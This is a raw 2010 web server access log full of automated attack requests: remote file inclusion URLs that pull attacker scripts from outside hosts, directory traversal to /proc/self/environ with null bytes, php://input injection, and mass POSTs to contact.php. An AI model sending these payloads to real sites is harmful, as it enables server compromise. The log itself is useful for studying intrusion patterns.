216.17.105.143 - - [31/Jul/2010:06:47:38 -0700] "POST /logs/contact.php HTTP/1.0" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:06:47:38 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
208.69.56.95 - - [31/Jul/2010:06:47:39 -0700] "GET /logs/access_100709.log//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
187.45.193.159 - - [31/Jul/2010:06:47:54 -0700] "GET /main.php?include=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
187.45.193.159 - - [31/Jul/2010:06:47:55 -0700] "GET /main.php?include=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
187.45.193.159 - - [31/Jul/2010:06:47:56 -0700] "GET /main.php?include=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
187.45.193.159 - - [31/Jul/2010:06:47:56 -0700] "POST /main.php?include=php://input HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.puaga.com"
208.69.56.95 - - [31/Jul/2010:06:47:59 -0700] "GET /logs/access_100509.log//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:48:25 -0700] "GET /logs/access.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:50:36 -0700] "POST /logs/access_100310.log/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:50:37 -0700] "POST /logs/access_100310.log/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:50:38 -0700] "POST /logs/access_100310.log/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:50:38 -0700] "POST /logs/access_100310.log/contact.php HTTP/1.1" 404 5258 "-" "plaNETWORK Bot Search" "www.puaga.com"
217.218.212.197 - - [31/Jul/2010:06:51:05 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
217.218.212.197 - - [31/Jul/2010:06:51:05 -0700] "POST /contact.php HTTP/1.0" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
217.218.212.197 - - [31/Jul/2010:06:51:05 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
217.218.212.197 - - [31/Jul/2010:06:51:12 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
217.218.212.197 - - [31/Jul/2010:06:51:12 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
217.218.212.197 - - [31/Jul/2010:06:51:13 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
217.218.212.197 - - [31/Jul/2010:06:51:18 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
217.218.212.197 - - [31/Jul/2010:06:51:19 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
217.218.212.197 - - [31/Jul/2010:06:51:19 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
217.218.212.197 - - [31/Jul/2010:06:51:25 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
217.218.212.197 - - [31/Jul/2010:06:51:25 -0700] "POST /logs/access_100704.log/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
217.218.212.197 - - [31/Jul/2010:06:51:25 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
110.138.208.125 - - [31/Jul/2010:06:53:55 -0700] "GET /logs/access_100504.log/modules/My_eGallery/index.php?basepath=http://kunki.org/1/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:55:20 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:55:20 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:55:21 -0700] "POST /logs/access_100719.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:55:50 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:55:50 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:55:50 -0700] "POST /logs/access_100719.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:56:01 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:06:56:05 -0700] "POST /logs/access_100710.log/contact.php HTTP/1.0" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:06:56:05 -0700] "POST /logs/access_100710.log/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:06:56:10 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:56:10 -0700] "GET /logs/access_100625.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:06:56:11 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:56:11 -0700] "GET ////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2875 "-" "libwww-perl/5.805" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:56:11 -0700] "GET /logs/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:06:56:16 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:06:56:16 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
119.235.18.12 - - [31/Jul/2010:06:56:25 -0700] "GET /////?mosConfig_absolute_path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 200 3640 "-" "libwww-perl/5.813" "www.puaga.com"
146.83.237.120 - - [31/Jul/2010:06:56:30 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:06:59:43 -0700] "GET /logs/access_100709.log//?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:06:59:49 -0700] "GET /logs/access_100509.log//?_PHPLIB[libdir]=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.182.63.25 - - [31/Jul/2010:06:59:58 -0700] "GET /logs/access_100620.log/////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:07:02:19 -0700] "POST /logs/access_100711.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:07:02:20 -0700] "POST /logs/access_100711.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:07:02:20 -0700] "POST /logs/access_100711.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
216.17.105.143 - - [31/Jul/2010:07:02:20 -0700] "POST /logs/access_100711.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
212.52.166.12 - - [31/Jul/2010:07:02:23 -0700] "GET /////?mosConfig_absolute_path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
212.52.166.12 - - [31/Jul/2010:07:02:29 -0700] "GET /logs/access_100415.log//////?mosConfig_absolute_path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
212.52.166.12 - - [31/Jul/2010:07:02:29 -0700] "GET /////?mosConfig_absolute_path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
212.52.166.12 - - [31/Jul/2010:07:02:30 -0700] "GET /logs//////?mosConfig_absolute_path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 200 25686 "-" "libwww-perl/5.803" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:07:02:38 -0700] "GET /*.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:03:18 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:03:18 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:03:18 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:03:19 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:03:21 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:03:21 -0700] "POST /logs/access_100720.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:03:21 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:03:21 -0700] "POST /logs/access_100720.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:03:21 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:03:21 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:03:21 -0700] "POST /logs/access_100720.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:07:03:21 -0700] "POST /logs/access_100720.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "kmccrew Bot Search" "www.puaga.com"
174.142.75.205 - - [31/Jul/2010:07:03:44 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
174.142.75.205 - - [31/Jul/2010:07:03:44 -0700] "GET /logs/access_100214.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
174.142.75.205 - - [31/Jul/2010:07:03:44 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
75.136.121.230 - - [31/Jul/2010:07:04:00 -0700] "GET /logs//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 200 25682 "-" "Mozilla/5.0" "www.puaga.com"
75.136.121.230 - - [31/Jul/2010:07:04:00 -0700] "GET /?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
75.136.121.230 - - [31/Jul/2010:07:04:01 -0700] "GET /logs/access_100709.log%20%20//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.75.205 - - [31/Jul/2010:07:04:07 -0700] "GET /logs/access_100518.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
212.52.166.12 - - [31/Jul/2010:07:04:53 -0700] "GET /logs/access_100410.log//////?mosConfig_absolute_path=http://www.ulster.irishhome.net/archive/ID-RFI.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
75.136.121.230 - - [31/Jul/2010:07:07:11 -0700] "GET /?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
75.136.121.230 - - [31/Jul/2010:07:07:12 -0700] "GET /logs//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 200 25682 "-" "Mozilla/5.0" "www.puaga.com"
75.136.121.230 - - [31/Jul/2010:07:07:12 -0700] "GET /?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
75.136.121.230 - - [31/Jul/2010:07:07:23 -0700] "GET /logs/access_100709.log%20%20//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:07:13:12 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
75.136.121.230 - - [31/Jul/2010:07:13:13 -0700] "GET /logs/access_100709.log%20%20//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
187.45.193.159 - - [31/Jul/2010:07:13:14 -0700] "GET /logs/index1.php?lang=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
187.45.193.159 - - [31/Jul/2010:07:13:14 -0700] "POST /logs/index1.php?lang=php://input HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:07:13:17 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:07:13:18 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:07:14:20 -0700] "GET /logs/access_100610.log/*.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:07:14:20 -0700] "GET /logs/access_100610.log/*.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:07:14:25 -0700] "GET /*.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:07:14:26 -0700] "GET /*.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:07:14:31 -0700] "GET /logs/*.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:07:14:31 -0700] "GET /logs/*.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
217.73.227.25 - - [31/Jul/2010:07:14:55 -0700] "GET /logs/access_100312.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://studentclub.tku.edu.tw/~history/blog/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.227.25 - - [31/Jul/2010:07:15:00 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://studentclub.tku.edu.tw/~history/blog/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.227.25 - - [31/Jul/2010:07:15:00 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://studentclub.tku.edu.tw/~history/blog/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:07:15:05 -0700] "GET /logs/access_100614.log/*.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
195.5.163.207 - - [31/Jul/2010:07:15:06 -0700] "GET /logs/access_100614.log/*.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
91.201.66.120 - - [31/Jul/2010:07:15:50 -0700] "GET /logs/access_100407.log HTTP/1.1" 200 1302739 "http://www.puaga.com/logs/access_100407.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.puaga.com"
75.136.121.230 - - [31/Jul/2010:07:15:53 -0700] "GET /logs/access_100509.log%20%20//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.227.25 - - [31/Jul/2010:07:15:54 -0700] "GET /logs/access_100228.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://studentclub.tku.edu.tw/~history/blog/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:15:54 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:15:54 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:15:55 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:15:55 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:15:56 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:15:56 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:15:57 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:15:57 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:15:58 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:15:58 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:15:58 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:15:59 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:15:59 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:15:59 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:16:00 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:16:00 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:16:00 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:16:04 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:16:04 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:16:05 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
222.96.156.72 - - [31/Jul/2010:07:16:06 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.0" 404 5258 "-" "Casper Bot Search" "www.puaga.com"
202.70.58.9 - - [31/Jul/2010:07:16:10 -0700] "GET /logs/access_100331.log HTTP/1.1" 200 786432 "http://www.google.co.id/search?q=filetype:log+payment&hl=id&client=firefox-a&rls=org.mozilla:en-US:official&prmd=i&ei=KiNUTMvOGcKwrAeSieHzAw&start=30&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8" "www.puaga.com"
216.65.69.25 - - [31/Jul/2010:07:17:42 -0700] "GET /logs/access_100428.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.ligadom.com/images/1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.65.69.25 - - [31/Jul/2010:07:17:42 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.ligadom.com/images/1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.65.69.25 - - [31/Jul/2010:07:17:42 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.ligadom.com/images/1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.65.69.25 - - [31/Jul/2010:07:17:50 -0700] "GET /logs/access_100320.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.ligadom.com/images/1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.65.69.25 - - [31/Jul/2010:07:17:59 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.ligadom.com/images/1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.65.69.25 - - [31/Jul/2010:07:17:59 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.ligadom.com/images/1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.65.69.25 - - [31/Jul/2010:07:17:59 -0700] "GET /logs/access_100428.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.ligadom.com/images/1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.65.69.25 - - [31/Jul/2010:07:18:05 -0700] "GET /logs/access_100320.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.ligadom.com/images/1.jpg???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:18:20 -0700] "GET /logs/access_100505.log//comment_modify.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:18:20 -0700] "GET /logs//comment_modify.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:18:20 -0700] "GET /comment_modify.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:18:36 -0700] "GET /comment_modify.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:18:36 -0700] "GET /logs//comment_modify.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:18:36 -0700] "GET /logs/access_100505.log//comment_modify.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.208.167.164 - - [31/Jul/2010:07:18:42 -0700] "GET /logs/access_100405.log//comment_modify.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.136.121.230 - - [31/Jul/2010:07:18:52 -0700] "GET /logs/access_100509.log%20%20//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.136.121.230 - - [31/Jul/2010:07:19:11 -0700] "GET /logs/access_100509.log%20%20//?_PHPLIB[libdir]=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
